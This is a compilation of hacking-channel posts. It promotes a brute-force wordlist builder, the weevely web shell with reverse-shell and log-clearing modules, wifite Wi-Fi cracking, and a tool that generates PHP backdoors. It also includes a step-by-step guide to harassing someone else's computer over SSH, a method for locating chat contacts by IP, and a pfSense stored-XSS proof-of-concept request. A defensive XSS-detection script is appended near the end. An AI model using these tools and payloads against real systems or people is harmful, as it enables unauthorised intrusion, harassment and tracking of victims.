UNDERCODE COMMUNITY

🦑 Updated: a powerful and useful hacker dictionary builder for a brute-force attack
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone --depth=1 --branch=master https://www.github.com/landgrey/pydictor.git

2) cd pydictor/

3) chmod +x pydictor.py

4) python pydictor.py

🦑 EXAMPLE USAGE :

type | wordlist  | identifier | description                                  | supported function
core | base      | C1         | basic wordlist                               | F1 F2 F3 F4
core | char      | C2         | custom character wordlist                    | F1 F2 F3 F4
core | chunk     | C3         | permutation and combination wordlist         | ALL
core | conf      | C4         | based on configuration file wordlist         | ALL
core | extend    | C5         | extend wordlist based on rules               | ALL
core | sedb      | C6         | social engineering wordlist                  | ALL
tool | combiner  | T1         | combine the specify directory files tool     |
tool | comparer  | T2         | compare two file content difference tool     | ALL
tool | counter   | T3         | word frequency count tool                    | ALL
tool | handler   | T4         | handle the input file tool                   | ALL
tool | uniqbiner | T5         | combine and unique the directory files tool  | ALL
tool | uniqifer  | T6         | unique the input file tool                   | ALL
tool | hybrider  | T7         | hybrid couples word list tool                | F1 F2 F3 F4

@undercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑 A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library
pinterest.com/undercode_Testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Ubuntu

Press [CTRL][ALT][T] to open a command window and run the following command to install the libraries:

sudo apt-get install python python-wxgtk3.0 rtl-sdr

Install the software using:

sudo pip install -U rtlsdr_scanner

Now you should be able to run the program:

python -m rtlsdr_scanner

2) Windows

To see if it's working open a command prompt.

Then run:

rtl_test

You should see an output similar to this:

Found 1 device(s):
0: PROlectrix DV107669

Using device 0: PROlectrix DV107669
Found Fitipower FC0012 tuner
Supported gain values (5): -9.9 -4.0 7.1 17.9 19.2

Info: This tool will continuously read from the device, and report if
samples get lost. If you observe no further output, everything is fine.

Reading samples in async mode...
lost at least 12 bytes

If so your dongle and driver are now fully installed.

Potential Errors

'rtl_test' is not recognized as an internal or external command, operable program or batch file.
  If you used the installer, first change to the installation directory; otherwise your PATH hasn't been set properly, try step 2 again.

rtl_test reports 'No supported devices found.'
  The driver has not been installed, try steps 3 to 7 again.

rtl_test keeps repeating 'lost at least'
  Your machine may be too slow, try closing other programs and plug the dongle into a different USB port.

@undercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Weaponized web shell Termux :
fb.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

FEATURES :

Shell access to the target
SQL console pivoting on the target
HTTP/HTTPS proxy to browse through the target
Upload and download files
Spawn reverse and direct TCP shells
Audit remote target security
Port scan pivoting on target
Mount the remote filesystem
Bruteforce SQL accounts pivoting on the target

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/epinna/weevely3

2) cd weevely3

3) run as python
weevely generate <password> <path>
weevely <URL> <password> [cmd]

🦑 Module Description
:audit_filesystem Audit the file system for weak permissions.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_etcpasswd Read /etc/passwd with different techniques.
:audit_phpconf Audit PHP configuration.
:shell_sh Execute shell commands.
:shell_su Execute commands with su.
:shell_php Execute PHP commands.
:system_extensions Collect PHP and webserver extension list.
:system_info Collect system information.
:system_procs List running processes.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:bruteforce_sql Bruteforce SQL database.
:file_gzip Compress or expand gzip files.
:file_clearlog Remove string from a file.
:file_check Get attributes and permissions of a file.
:file_upload Upload file to remote filesystem.
:file_webdownload Download an URL.
:file_tar Compress or expand tar archives.
:file_download Download file from remote filesystem.
:file_bzip2 Compress or expand bzip2 files.
:file_edit Edit remote file on a local editor.
:file_grep Print lines matching a pattern in multiple files.
:file_ls List directory content.
:file_cp Copy single file.
:file_rm Remove remote file.

@undercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Complete termux wifi hacking tool
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

FEATURES :

1) WPS: The Offline Pixie-Dust attack

2) WPS: The Online Brute-Force PIN attack

3) WPA: The WPA Handshake Capture + offline crack.

4) WPA: The PMKID Hash Capture + offline crack.

5) WEP: Various known attacks against WEP, including fragmentation, chop-chop, aireplay, etc.

6) Run wifite, select your targets, and Wifite will automatically start trying to capture or crack the password.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/derv82/wifite2.git

2) cd wifite2

3) sudo ./Wifite.py

🦑 To install onto your computer (so you can just run wifite from any terminal), run:

1) sudo python setup.py install
This will install wifite to /usr/sbin/wifite which should be in your terminal path.

Note: Uninstalling is not as easy. The only way to uninstall is to record the files installed by the above command and remove those files:

2) sudo python setup.py install --record files.txt \
&& cat files.txt | xargs sudo rm \
&& rm -f files.txt

@undercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Termux - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
t.me/undercodeTesting

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/Dionach/CMSmap

2) Then you need to configure the edbtype and edbpath settings in cmsmap.conf. Use GIT if you have a local Git repository of Exploit-db :

[exploitdb]
edbtype = GIT
edbpath = /opt/exploitdb/

3) Alternatively, use APT if you have installed the debian exploitdb package. For Kali, use the following settings :

[exploitdb]
edbtype = APT
edbpath = /usr/share/exploitdb/

4) If you would like to run cmsmap from anywhere in your system you can install it with pip3 :

cd CMSmap
pip3 install .

@undercodeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New accounts - login with the given proxies, Express Vpn tested :
t.me/undercodeTesting




▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Premium Proxies _New :


@UndercodeOfficial
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ACCESS ANY PC VIA HACK SSH Full by Undercode :
What can I do on someone else’s PC using SSH ?
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Step 1 - Configure Access and Launch Basic Applications

1) First you need to set a variable so that everything we launch appears on the remote computer that we logged in to through SSH, and not on the local computer from which we logged in. Configure the display path with the following command:

export DISPLAY=:0.0

Now, by writing a simple firefox command via SSH, you will open a Firefox browser window on the remote computer.

2) But for our first example, let's open the xterm window, displaying network data that looks pretty troubling for a beginner. To make the situation worse, we will do it 10 times. Accordingly, there will be 10 open windows.

3) To do this, we will execute the command in a loop:

for i in {1..10}; do sudo xterm -maximize -e sudo tcpdump; done

In this case, we open the terminal window of the maximum size, and the -e option means that we execute sudo tcpdump in the xterm window that we run.


Step 2 - Calling, Whistling and Speech

1) Before we can reproduce any noise, we need to execute the following command in order to be able to control the speakers remotely:

sudo modprobe pcspkr

2) Now we have many options! First, we can say any phrase through the computer using the say or espeak command.

say "I am a canadian randomware, I have not encrypted any files but would appreciate some change"
espeak "please give me quarters sorry to bother you"

We can schedule such messages so that they run periodically by adding them to crontab.

3) We can use beep to drive the user crazy. To use beep, install it with apt install beep.

🦑 After installation, look at the manual using man beep to evaluate its capabilities:

BEEP(1) General Commands Manual BEEP(1)

NAME
beep - beep the pc speaker any number of ways

SYNOPSIS
beep [--verbose | --debug] [-e device | --device device] [-f
N] [-l N] [-r N] [-d N] [-D N] [-s] [-c]

beep [ OPTIONS ] [-n] [--new] [ OPTIONS ]

beep [-h] [--help]

beep [-v] [-V] [--version]

🦑 We can generate almost any noise with Beep. The following table with frequencies may come in handy:

Note Frequency
C 261.6
C# 277.2
D 293.7
D# 311.1
E 329.6
F 349.2
F# 370.0
G 392.0
G# 415.3
A 440.0
A# 466.2
B 493.9
C 523.2

🦑 Step 3 - Awesome Error Messages
Confusing or disturbing error messages are fun, as users usually trust them until they become too absurd. Such messages can be completely different.

We can show small messages using the notify-send command, with the header and body of the message.

notify-send 'WARNING' 'I AM CALLING THE INTERNET POLICE'

This message will pop up in the corner. Kinda boring. Instead, we can display a large bold alarm message with the whiptail command and run it in a full-screen window.

xterm -maximized -fullscreen -fa 'Monospace' -fs 19.31 -e whiptail --title "CRITICAL: ACTION CANNOT BE UNDONE" --msgbox "UNAUTHORIZED LOGIN! DATA SAFEGUARD SYSTEM WILL DESTROY THIS TERMINAL IN 10 SECONDS, STAY 30 FEET CLEAR TO AVOID BLAST" --topleft 23 79

You can replace it with your own message.

Step 4 - Cron Tasks from Hell
Now we can start combining tasks and plan their automatic launch. We can check if there are any existing jobs in crontab with the -l flag, and then add a new job with the -e flag.

crontab -l
crontab -e

In the configuration window that opens, you can add a task for execution every 60 seconds according to the following formula.

* * * * * (your code here)

In order for the computer to beep every 60 seconds, we can add this record and then press ctrl x and y to save the file.

* * * * * beep -f 300.7 -r 10 -d 50 -l 400

As soon as the file is saved, the computer will emit a sound signal with the given parameters every 60 seconds.

🦑 Step 5 - Completing Custom Tasks

1) If you have access to someone else’s computer using SSH, you can turn off any running process. This will lead to a sudden stop of the application in use, and accordingly, the user will not be able to use the computer effectively. To find the process ID, we can use the top or htop commands. If you do not have htop installed, you can install it with the command below.

apt install htop

🦑 TASK :

1)
Tasks: 219 total, 1 running, 178 sleeping, 0 stopped, 0 zombie
%Cpu(s): 3.0 us, 0.4 sy, 0.0 ni, 95.6 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 4968836 total, 1431244 free, 1104324 used, 2433268 buff/cache
KiB Swap: 5138428 total, 5138428 free, 0 used. 3367804 avail Mem

2) Take a random beep and combine it with some bash commands to create many Firefox browser windows that open every 60 seconds and go to “Never Gonna Give You Up.”

3) for i in {1..10}; do beep -f 4000 -D 500 -l 1000 -r 10 & firefox -new-window

USE FOR LEARN NOT FOR HARM

WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Use the netstat command to quickly find the other party's IP address
> Use the netstat network command built into Windows to quickly find out the IP address of a chat contact. The specific operations are as follows:
fb.com/undercodeTesting

1) Click the <Start> button, choose the <Run> command in the pop-up shortcut menu, enter cmd in the <Run> dialog box that appears, and click the <OK> button to open the <Command Prompt> window. (I was too lazy to take screenshots after turning on the computer.)

2) Find a xy friend or WeChat friend, open the chat window with them, and then send a picture to the other party.

3) At this time, enter the netstat -n command in the <Command Prompt> window and execute it. In the output, you can see which addresses are currently connected to the local computer. If the status of a connection is ESTABLISHED, the connection between the local computer and the remote computer has succeeded, and the returned information is as follows.

4) In the example, after sending, there are four successful connections. Among them, the host that opens the port 80 service is the QQ server, namely the two IP addresses 106.120.165.244 and 101.199.97.107.

5) Now, open a query website and query the IP address 106.120.165.244. You can see that the information of the other party has been successfully queried. A query of the other IP address shows that it belongs to Qihoo. For positioning, whatismyip is recommended because it narrows the result to a smaller area.


🦑 Attachment: The netstat command is mainly used to display network connection information. It is a very useful tool for monitoring TCP/IP networks. It lets users know which network connections currently exist on the system.

1) Enter netstat /? in the <Command Prompt> window to get help information for this command.

-a or --all: display all connected sockets;
-A <network type> or --<network type>: list related addresses in the connections of this network type;
-c or --continuous: continuously list the network status;
-C or --cache: display the cache information of the router configuration;
-e or --extend: display other related information of the network;
-F or --fib: display FIB;
-g or --groups: display the list of multicast group members;
-h or --help: online help;
-i or --interfaces: display the network interface information table;
-l or --listening: display the listening server sockets;
-M or --masquerade: display masqueraded network connections;
-n or --numeric: use the IP address directly without going through the domain name server;
-N or --netlink or --symbolic: display the symbolic connection name of the network hardware peripheral devices;
-o or --timers: display timers;
-p or --programs: display the program identification code and program name of the socket being used;
-r or --route: display the routing table;
-s or --statistics: display the network statistics table;
-t or --tcp: display the connection status of the TCP transmission protocol;
-u or --udp: display the connection status of the UDP transmission protocol;
-v or --verbose: display the command execution process;
-V or --version: display version information;
-w or --raw: display the connection status of the RAW transfer protocol;
-x or --unix: the effect of this parameter is the same as specifying the "-A unix" parameter;
--ip or --inet: the effect of this parameter is the same as specifying the "-A inet" parameter.

2) The command to remember from the list above is netstat -n!

🦑 Also! The command syntax information is as follows:

NETSTAT [-a] [-n] and so on

Don’t do bad things for fun

Written by Undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Tracking
> A skill pseudo-hackers must know: query the other party's IP address and determine the true geographic location
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Preparation:

In order to query the other party's IP address and real geographic location, we need to use the "IP Radar" software. It shows which URLs you have visited, the IP address, geographic location and domain name of each URL, as well as the accessing program, the access time, the number of bytes transferred, which programs are reading and writing your hard drive, and other functions.

> Supported systems: WinXP / Win2003 / Vista / Win7 / Win8

🦑 Second, the query method:

1) After downloading "IP Radar", decompress it and double-click to run it.

2) With "IP Radar" running in monitoring mode, open the QQ chat window to chat with the friend whose IP address and real geographic location you want to obtain. Try to send the other party some large messages such as pictures or music.

3) Then, in the "IP Radar" program, find the row where the "QQ.exe" program is listed and double-click it to open the network access details of that program.

4) In the pop-up message box, you can find the other party's QQ IP address and geographic location information.

5) If you are afraid that the geographic location provided by "IP Radar" is not accurate enough, you can also enter the IP address directly into the search box of a search engine and click search to find the geographic location of the IP!

6) To get the download address of "IP Radar", search for "computer those things" in WeChat, follow our official public account, and reply "IP Radar" to receive the push message!

Don’t worry about computer freezes or problems. Follow the WeChat public account "the computer’s things" (questions about computer systems, software applications and other problems are all welcome).

> This is a simple process of tracking by app; will send more for IP tracking..

Written by Undercode
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 I have too many account passwords, what should I do? Teach you to set a complex and memorable password
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) If the password is set to one universal, easy-to-remember value, then, as in the often-heard "crash library" (credential stuffing) cases, breaking the password of one website makes all of your online information transparent. If passwords are complex and different for every site, after a long time you forget which password is which, and retrieving the password every time you log in wastes half a day. The problem of setting a password seems simple, but it troubles our daily life.

2) We don’t have time to study cryptography in order to set up a password, and we don’t want our online information to be easily obtained by people with bad intentions. A simple trick can deal with it. When setting a password, you will find that the combination of letters + numbers + symbols has a high security level, and that a length of 6 digits or of more than 8 digits is generally required. So it is best to design our passwords according to this standard.

🦑 1) The first step is to think of a basic code. It can be a number, the spelling of a name, or an abbreviation of a saying, such as "every day upwards", which corresponds to "TTXS", lowercase "ttxs", or 4463 (the stroke count of each word).

2) The second step is to add a personal classification to the basic code. For example, accounts related to finance are defined as FINA or fa, and the non-financial category is defined as Game; you can define these yourself.

3) The third step is to add a tag for each website. For example, Today's Headline can be identified as TT (the first letters of the name).

4) Then combine these into a complex and memorable password rule: personal classification + basic code + website tag (the order can be changed at will, for example basic code + personal classification + website tag). For example, the Today's Headline password can be set to fa4463TT (finance-related account, the stroke counts of "every day upwards", the first letters of the name); the Weibo password can be set to Game4463wb (non-financial account, the stroke counts of "every day upwards", the abbreviation of Weibo). We only need to remember our own coding rules.

5) The above method can produce a series of different, complex, regular and easy-to-remember passwords. You don't have to worry about a password written down on a computer or in a small notebook being stolen, you don't have to fear that the "crash library" method can easily steal your password, and you don't have to waste time retrieving passwords frequently.

WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Verified bug by Undercode
> pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
t.me/undercodeTesting


# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr


# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.


POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d

__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save


🦑 Please USE FOR LEARN NOT FOR STEAL »

@UNDERCODEOFFICIAL
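
Added example, not part of the original post and not pfSense code: a defender-side check for the issue described above. It decodes a form-encoded body, flags markup in fields that the UI later renders as text (here descr), and shows the value after output encoding, which is the control that stops the stored payload from executing. The function names and the trimmed sample body are constructed for illustration.

```python
"""Flag markup in form-encoded text fields and show the output-encoded form."""
import html
import re
from urllib.parse import parse_qsl

# Constructed sample: the POC body from the post, trimmed to three fields.
SAMPLE_BODY = (
    "usernamefld=TEST"
    "&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E"
    "&utype=user"
)

# Heuristics for content that does not belong in a plain-text "Full Name".
# Detection is best effort; encoding on output is the actual fix.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
SCHEME_RE = re.compile(r"\bjavascript\s*:", re.IGNORECASE)


def decode_fields(body):
    """Decode an application/x-www-form-urlencoded body into a dict."""
    return dict(parse_qsl(body, keep_blank_values=True))


def markup_findings(value):
    """Return the reasons a value looks like HTML or script rather than text."""
    reasons = []
    if TAG_RE.search(value):
        reasons.append("html-tag")
    if HANDLER_RE.search(value):
        reasons.append("event-handler")
    if SCHEME_RE.search(value):
        reasons.append("javascript-uri")
    return reasons


def audit_body(body, text_fields=("descr",)):
    """Check the fields that are later rendered as text.

    Returns {field: {"raw", "reasons", "encoded"}} for flagged fields only.
    """
    report = {}
    fields = decode_fields(body)
    for name in text_fields:
        value = fields.get(name, "")
        reasons = markup_findings(value)
        if reasons:
            report[name] = {
                "raw": value,
                "reasons": reasons,
                # What the page should emit instead of the raw stored value.
                "encoded": html.escape(value, quote=True),
            }
    return report


if __name__ == "__main__":
    for field, info in audit_body(SAMPLE_BODY).items():
        print(field, info["reasons"])
        print("  stored  :", info["raw"])
        print("  rendered:", info["encoded"])
```

The same check can be run over existing user records to find stored values that already contain markup.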
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Why KillShot ?

You can use this tool to spider your website and gather important information automatically using whatweb, host, traceroute, dig, fierce and wafw00f, or to identify the CMS and find vulnerabilities in your website using the Cms Exploit Scanner and the WebApp Vul Scanner. You can also use killshot to run multiple types of scan automatically with nmap and unicorn. With this tool you can also generate simple PHP backdoors, upload them manually and connect to the target using killshot.

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

Linux Setup

1) git clone https://github.com/bahaabdelwahed/killshot

2) cd killshot

3) ruby setup.rb (if setup shows any error, just try to install the gems/tools manually)

4) ruby killshot.rb

> Windows Setup

1) Download ruby for windows ==> https://rubyinstaller.org/downloads/

2) Download Cmder here ==> http://cmder.net/

3) Download Curl For 64/32 ==> https://curl.haxx.se/windows/

4) Download nmap ==> https://nmap.org/download.html
Enjoy !


🦑 FEATURES :
[0] Nmap Scan
[1] Unicorn Scan
Nmap Scan
[2] Nmap Os Scan
[3] Nmap TCP Scan
[4] Nmap UDB Scan
[5] Nmap All scan
[6] Nmap Http Option Scan
[7] Nmap Live target In Network
Unicorn Scan
[8] Services OS
[9] TCP SYN Scan on a whole network
[01] UDP scan on the whole network

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 - Capstone disassembly/disassembler framework: Core (Arm, Arm64, BPF, EVM, M68K, M680X, MOS65xx, Mips, PPC, RISCV, Sparc, SystemZ, TMS320C64x, Web Assembly, X86, X86_64, XCore) + bindings.
twitter.com/undercodeNews

🦑 FEATURES :

1) Multi-architectures: Arm, Arm64 (Armv8), BPF, Ethereum Virtual Machine, M68K, M680X, Mips, MOS65XX, PowerPC, RISCV, Sparc, SystemZ, TMS320C64X, Web Assembly, XCore & X86 (include X86_64).

2) Clean/simple/lightweight/intuitive architecture-neutral API.

3) Provide details on disassembled instruction (called “decomposer” by some others).

4) Provide some semantics of the disassembled instruction, such as list of implicit registers read & written.

5) Implemented in pure C language, with bindings for D, Clojure, F#, Common Lisp, Visual Basic, PHP, PowerShell, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala available.

6) Native support for Windows & *nix (with Mac OSX, iOS, Android, Linux, *BSD & Solaris confirmed).

7) Thread-safe by design.

8) Special support for embedding into firmware or OS kernel.

9) High performance & suitable for malware analysis (capable of handling various X86 malware tricks).

10) Distributed under the open source BSD license.

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

Debian/Ubuntu Linux - core engine

NOTE: At the moment only version 2.1.2 is available in Ubuntu/Debian repositories. Version 3.0.4 will be provided later.

Capstone is available in Ubuntu & Debian Linux (testing/sid flavours). The binary package of the core of Capstone can be installed with:

1) $ sudo apt-get install libcapstone2

To write your own tools with Capstone, install the development package with:

2) $ sudo apt-get install libcapstone-dev

Mac OSX - core engine

Macport users can install the core of Capstone with:

3) $ sudo port install capstone

Note that Macport installs libraries into its own directory, so you need to tell applications where to find them, for example with:

4) $ export DYLD_LIBRARY_PATH=/opt/local/lib/:$DYLD_LIBRARY_PATH

Homebrew users can install the core of Capstone with:

5) $ brew install capstone

Note that Homebrew installs libraries into its own directory, so you need to tell applications where to find them, for example with:

6) $ export DYLD_LIBRARY_PATH=/usr/local/opt/capstone/lib/:$DYLD_LIBRARY_PATH

@UndercodeOfficial
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁